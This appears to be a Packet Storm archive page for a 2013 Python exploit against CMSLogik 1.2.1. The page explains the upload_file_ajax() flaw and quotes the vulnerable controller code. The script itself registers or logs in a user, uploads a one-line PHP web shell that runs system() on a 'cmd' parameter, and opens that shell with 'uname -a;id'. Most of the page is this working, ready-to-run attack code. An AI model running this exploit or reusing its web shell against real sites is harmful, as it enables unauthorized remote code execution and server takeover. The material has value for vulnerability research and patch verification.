seeing is believing

CMSLogik 1.2.1 Shell Upload

CMSLogik 1.2.1 Shell Upload
Posted Apr 15, 2013
Authored by LiquidWorm | Site zeroscience.mk

CMSLogik version 1.2.1 remote shell upload exploit that leverages upload_file_ajax().

tags | exploit, remote, shell
MD5 | baaeffbd26f6f66a85728c22ff736084

CMSLogik 1.2.1 Shell Upload

Change Mirror Download
#!/usr/bin/python
#
# CMSLogik 1.2.1 (upload_file_ajax()) Shell Upload Exploit
#
#
# Vendor: ThemeLogik
# Product web page: http://www.themelogik.com/cmslogik
# Affected version: 1.2.1 and 1.2.0
#
# Summary: CMSLogik is built on a solid & lightweight framework
# called CodeIgniter, and design powered by Bootstrap. This
# combination allows for greater security, extensive flexibility,
# and ease of use. You can use CMSLogik for almost any niche that
# your project might fall into.
#
# Desc: The vulnerability is caused due to the improper verification
# of uploaded files in '/application/controllers/support.php' script
# thru the 'upload_file_ajax()' function. This can be exploited to
# execute arbitrary PHP code by uploading a malicious PHP script file
# with multiple extensions in the '/support_files' directory. Normal
# user [level 113] authentication required.
#
# ======================================================================
# /application/controllers/support.php:
# -------------------------
#
# 143: public function upload_file_ajax()
# 144: {
# 145: $allowedExtensions = array('jpeg', 'jpg', 'gif', 'png', 'html', 'php', 'js', 'doc', 'docx', 'pdf', 'ppt', 'pps', 'pptx', 'ppsx');
# 146: $sizeLimit = 10 * 1024;
# 147: $params = array('extensions' => $allowedExtensions, 'size' => $sizeLimit);
# 148: $this->load->library('qqfileuploader', $params);
# 149:
# 150: $result = $this->qqfileuploader->handleUpload('./support_files');
# 151:
# 152: echo htmlspecialchars(json_encode($result), ENT_NOQUOTES);
# 153: }
#
# ======================================================================
#
# Tested on: Apache/2.2.22
# PHP/5.3.15
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2013-5138
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5138.php
#
#
# 05.04.2013
#

import json, re, sys
import urllib, urllib2, time
import cookielib, webbrowser

if len(sys.argv) < 3:
print '\n\n\x20-\x20\x20[*] Usage: ' +sys.argv[0]+ ' <target> <path>\n'
print '\n\x20-\x20\x20[*] Example: ' +sys.argv[0]+ ' example.com cmslogik\n'
sys.exit(0)

host = sys.argv[1]
path = sys.argv[2]

def reguser():
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
username = raw_input('[+] Enter username [at least 4 characters]: ')
chk_usr = urllib.urlencode({'user' : username})
try:
xhr = json.load(opener.open('http://' +host+ '/' +path+ '/main/unique_username_ajax', chk_usr))
for key, value in xhr.iteritems():
fnrand = value
break
if fnrand == '1':
print '[!] The user ' +username+ ' is not available.'
print '[!] Choose a more unique username please.'
reguser()
except:
print '[!] No connection to host'
sys.exit(0)
else:
print '[*] The user \'' +username+ '\' is available.'
email = raw_input('[+] Choose e-mail [unique@unique.unique]: ')
password = raw_input('[+] Choose password [at least 6 characters]: ')
reg_data = urllib.urlencode({'email' : email,
'full_name' : 'Patch',
'password1' : password,
'password2' : password,
'r_username' : username,
'register' : 'Register!'}
)
auth = opener.open('http://' +host+ '/' +path+ '/register', reg_data)
match = auth.read()
if re.search(r"Sorry but that Email is already in use!", match):
print '[!] The e-mail you have chosen is already taken. Try again.'
reguser()
elif re.search(r"You have been registered", match):
print '[*] OK.'
loguser()
else:
print '[!] Something is fishy.'
sys.exit(0)

def loguser():
print '\n[*] Login please.'
username = raw_input('\n[+] Enter your username: ')
password = raw_input('[+] Enter your password: ')
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
login_data = urllib.urlencode({'username' : username,
'password' : password,
'login' : 'Login',
'remember_me' : 'remember'}
)
auth = opener.open('http://' +host+ '/' +path+ '/login', login_data)
match = auth.read()
if re.search(r"Error!", match):
print '\n[!] Not logged in! Try again.'
loguser()
else:
print '\n[*] Successfully logged in!'
print '[*] Uploading malicious php file...'
time.sleep(3)
upload_data = '<?php echo \'<pre>\' + system($_GET[\'cmd\']) + \'</pre>\'; ?>'
xhr2 = json.load(opener.open('http://' +host+ '/' +path+ '//support/upload_file_ajax?qqfile=liwo_sh.php', upload_data))
for key, value in xhr2.iteritems():
filename = value
break
print '[*] Your shell ID is: ' + filename + '.php'
time.sleep(2)
print '[*] Let me open that for ya...'
time.sleep(2)
webbrowser.open('http://' +host+ '/' +path+ '/support_files/' +filename+ '.php?cmd=uname -a;id')
print '\n[*] Zya!'
sys.exit(0)

def menu():
print """
(((((((((((((((((((((((((((((((((((((((((((((((((((
(( ((
(( Hello! CMSLogik Shell Upload 0day ((
(( ((
(( 1. Register a new User ((
(( 2. Login with existing User ((
(( ((
(((((((((((((((((((((((((((((((((((((((((((((((((((

"""
n = raw_input('Enter choice number: ');
if n=='1':
print '\n[*] Welcome to User Registration!'
reguser()
elif n=='2':
loguser()
else:
print '\n[?] Just 1 or 2 please...'
menu()
menu()

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    6 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close